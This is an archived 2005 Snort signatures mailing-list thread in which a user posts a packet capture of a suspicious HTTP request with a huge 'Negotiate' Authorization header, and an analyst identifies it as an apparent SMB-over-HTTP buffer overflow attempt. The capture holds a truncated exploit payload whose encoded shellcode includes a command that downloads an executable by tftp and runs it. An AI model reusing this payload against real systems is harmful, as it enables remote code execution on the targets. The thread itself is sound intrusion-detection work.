Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Snort-Signatures
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: [Snort-sigs] Authorization overflow ?

from [GNSC NetDefense Correlation] Network Security [Permanent Link]
Subject: RE: [Snort-sigs] Authorization overflow ?
Date: Mon, 8 Aug 2005 07:36:27 -0500 
This looks remarkably like an SMB Over HTTP Buffer Overflow attempt.  Check
out the following link.

http://isc.sans.org/diary.php?date=2005-06-03


Tommy Thompson
Senior Infosec Analyst
GNSC Net Defense Correlation
Scott AFB, IL
(618) 229-8743/8744, DSN: 779-XXXX
Email: gnsc-nd_correlation@disa.mil


-----Original Message-----
From: rmkml [mailto:rmkml@free.fr]
Sent: Monday, August 08, 2005 5:38 AM
To: Snort-sigs@lists.sourceforge.net
Subject: [Snort-sigs] Authorization overflow ?


Hi,

Im received this http request :

17:38:18.047054 83.81.37.203.1574 > x.x.x.x.80: . [tcp sum ok] 
4038566652:4038568112(1460) ack 3750935641 win 64240 (DF) (ttl 117, id 
53120, len 1500)
GET / HTTP/1.0\r\nHost: x.x.x.x\r\nAuthorization: 
Negotiate 
YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF....

17:38:18.055464 83.81.37.203.1574 > x.x.x.x.80: . [tcp sum ok] 
4038568112:4038569572(1460) ack 3750935641 win 64240 (DF) (ttl 117, id 
53121, len 1500)
BQUFBQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+M
uSYs0iwHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0A
whcB4D4tADItwHK2L
aAjpCwAAAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1p
IDAuMC4wLjAgR0VUIFpsaC5leGUmc3RhcnQgWmxoLmV4ZSZleGl0AEJCQkJCQkJCQkJCQkJCQkJC
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQiMKAwgA+A8BAPgPASOCCD
kDggQRAENDQ0Mg8P1/U1ZXZoHsgACJ5ujtAAA....

17:38:18.101453 83.81.37.203.1574 > x.x.x.x.80: . [tcp sum ok] 
4038569572:4038571032(1460) ack 3750935641 win 64240 (DF) (ttl 117, id 
53123, len 1500)
A/zZoCRLWY+j3AAAAiUYI6KIAAAD/dgRoa9AryujiAAAAiUYM6D8AAAD/dgRo+pcCTOjNAAAAMdt
oEAQAAFP/0InDVot2EInHuRAEAADzpF4xwFBQUFNQUP9WDItGCGaBxIAAX15b/+Bg6CMAAACLRCQ
MjVh8g0M8BYFDKAAQ
AACBYygA8P//iwQkg8QUUDHAwzHSZP8yZIkiMdu4kEKQQjHJsQKJ3/OvdAND6/OJfhBkjwJYYcNg
vyDw/X+LH4tGCIkHi3/4gcd4AQAAifk5GXQEiwnr+In6OVoEdAWLUgTr9okRiUoExkP9AWHDoQzw
/X+LQByLWAiJHosAi0AIiUYEw2CLbCQoi0U8i1QFeAHqi0oYi1ogAevjO
EmLNIsB7jH/McD8rDjgdAfBzw0Bx+v0O3wkJHXhi1okAetmiwxLi1ocAeuLBIsB6IlEJBxhwggA6
/5DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ
0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0
NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0
NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0
NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0N
DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0N
DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0N
DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0ND
Q0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0ND
Q0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0ND
Q0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ
0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ
0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDI4IEIAMJA
OsGkJCQkJCQA4IEEQBERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERER....

17:38:18.110442 83.81.37.203.1574 > x.x.x.x.80: FP [tcp sum ok] 
4038571032:4038572350(1318) ack 3750935641 win 64240 (DF) (ttl 117, id 
53124, len 1358)
ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
ERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERER
ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
ERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERER
ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
ERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERER
ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER
ERERERERERERERERERERE==\r\n\r\n...

new exploit ?

Im use snort240b18 with rule24 :
08/07-17:38:18.055464  [**] [119:15:1] (http_inspect) OVERSIZE REQUEST-URI 
DIRECTORY [**] {TCP} 83.81.37.203:1574 -> x.x.x.x:80


Regards
Rmkml


-------------------------------------------------------
SF.Net email is Sponsored by the Better Software Conference & EXPO
September 19-22, 2005 * San Francisco, CA * Development Lifecycle Practices
Agile & Plan-Driven Development * Managing Projects & Teams * Testing & QA
Security * Process Improvement & Measurement * http://www.sqe.com/bsce5sf
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs


-------------------------------------------------------
SF.Net email is Sponsored by the Better Software Conference & EXPO
September 19-22, 2005 * San Francisco, CA * Development Lifecycle Practices
Agile & Plan-Driven Development * Managing Projects & Teams * Testing & QA
Security * Process Improvement & Measurement * http://www.sqe.com/bsce5sf
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [Snort-sigs] Authorization overflow ?, rmkml
Next by Date:  Re: [Snort-sigs] Authorization overflow ?, Frank Knobbe
Previous by Thread:  Re: [Snort-sigs] Authorization overflow ?, Frank Knobbe
Next by Thread:  [Snort-sigs] Re: Snort-sigs digest, Vol 1 #1451 - 2 msgs, Nick Plante
Indexes:  [Date] [Thread] [Top] [All Lists]